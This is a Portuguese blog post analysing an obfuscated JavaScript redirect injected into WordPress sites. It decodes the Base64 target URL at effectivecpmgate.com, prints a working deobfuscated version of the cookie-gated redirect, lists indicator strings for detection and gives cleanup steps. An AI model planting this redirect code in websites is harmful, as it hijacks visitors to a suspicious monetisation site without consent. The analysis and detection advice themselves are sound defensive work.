Muitos sites WordPress sofrem com esta injeção de código malicioso, o famoso Malware Injection.
Vamos desvendar este, vou suprimir ele e colocar em um arquivo texto para download, logo abaixo.
var _0x957b=[“\x67\x65\x74\x54\x69\x6D\x65″,”\x73\x65\x74\x54\x69\x6D\x65”, …. continua.
Malware “effectivecpmgate.com”Atenção tenha cuidado.
14 Downloads
Diagnóstico
Isso é um redirect malicioso/“adware” bem comum, só que ofuscado.
O que o código faz (em português claro)
- Define uma lista de strings em
_0x957b(tipo"cookie","href","location", etc.) pra dificultar leitura. - Cria duas funções:
_yuy(nome, valor, dias, path)→ grava um cookie com expiração emdias._rtr(nome)→ lê um cookie pelo nome.
- Se o navegador aceita cookies (
navigator.cookieEnabled):- Verifica se o cookie
_wpth-1já é"1". - Se não for, ele:
- seta o cookie
_wpth-1=1por 1 dia e com path “/” - faz redirect (
window.location.href = ...) para uma URL em Base64.
- seta o cookie
- Verifica se o cookie
Ou seja: ele te manda para um site externo uma vez, e usa o cookie pra não redirecionar de novo até expirar.
A URL escondida (Base64)
O trecho é:
window.location.href = atob(_0x957b[18])
E _0x957b[18] é:
aHR0cHM6Ly93d3cuZWZmZWN0aXZlY3BtZ2F0ZS5jb20vY2lhbmR1NWg/a2V5PTUxY2Q5MGZjYjk2MGZhYmM2MDVjYjNjNWFhOGIyZjc y
Isso decodifica para:
https://www.effectivecpmgate.com/ciandu5h?key=51cd90fcb960fabc605cb3c5aa8b2f72
(effectivecpmgate.com é típico de rede de redirecionamento/monetização suspeita.)
Versão “desofuscada” do comportamento (equivalente)
function setCookie(name, value, days, path="/") {
const d = new Date();
d.setTime(d.getTime() + days * 24 * 3600000);
document.cookie = `${name}=${escape(value)};expires=${d.toGMTString()}; path=${path}`;
}
function getCookie(name) {
const key = name + "=";
const i = document.cookie.indexOf(key);
if (i === -1) return null;
let j = document.cookie.indexOf(";", i + key.length);
if (j === -1) j = document.cookie.length;
return unescape(document.cookie.substring(i + key.length, j));
}
if (navigator.cookieEnabled) {
if (getCookie("_wpth-1") != "1") {
setCookie("_wpth-1", "1", 1, "/");
window.location.href = "https://www.effectivecpmgate.com/ciandu5h?key=51cd90fcb960fabc605cb3c5aa8b2f72";
}
}
Observações importantes
- O texto contém o mesmo bloco repetido várias vezes. Isso é outro sinal de injeção (plugin/tema comprometido, snippet colado múltiplas vezes, ou malware que reinjeta).
- O nome do cookie
_wpth-1sugere WordPress (wpth = “wp theme”/“wp …” é um padrão que aparece em infecções).
Como remover/mitigar (prático)
- Procure no código do site (tema, header/footer, functions.php, plugins, widgets, banco
wp_options) por:effectivecpmgate_wpth-1ciandu5hatob(aHR0cHM6Ly93d3cuZWZmZWN0aXZlY3BtZ2F0ZS5jb20
- Limpe o cookie (só pra parar o redirect localmente): apague
_wpth-1no navegador (mas isso não remove a causa). - Atualize WordPress + plugins + tema, troque senhas, revise usuários admin e rode um scanner (Wordfence/Sucuri etc.).
Conclusão:
Ao analisar o código, eu identifiquei que ele está fortemente ofuscado com o objetivo de dificultar a leitura e esconder sua real função. Na prática, ele cria e consulta um cookie (_wpth-1) para controlar a execução de um redirecionamento automático. Caso esse cookie ainda não exista, o script o grava e, em seguida, altera window.location.href para encaminhar o usuário a um domínio externo decodificado via atob(), caracterizando um comportamento típico de redirecionamento não autorizado. Para mim, esse padrão é consistente com scripts maliciosos ou injeções de adware, geralmente inseridos em sites comprometidos, com a intenção de monetizar tráfego ou levar visitantes para páginas suspeitas.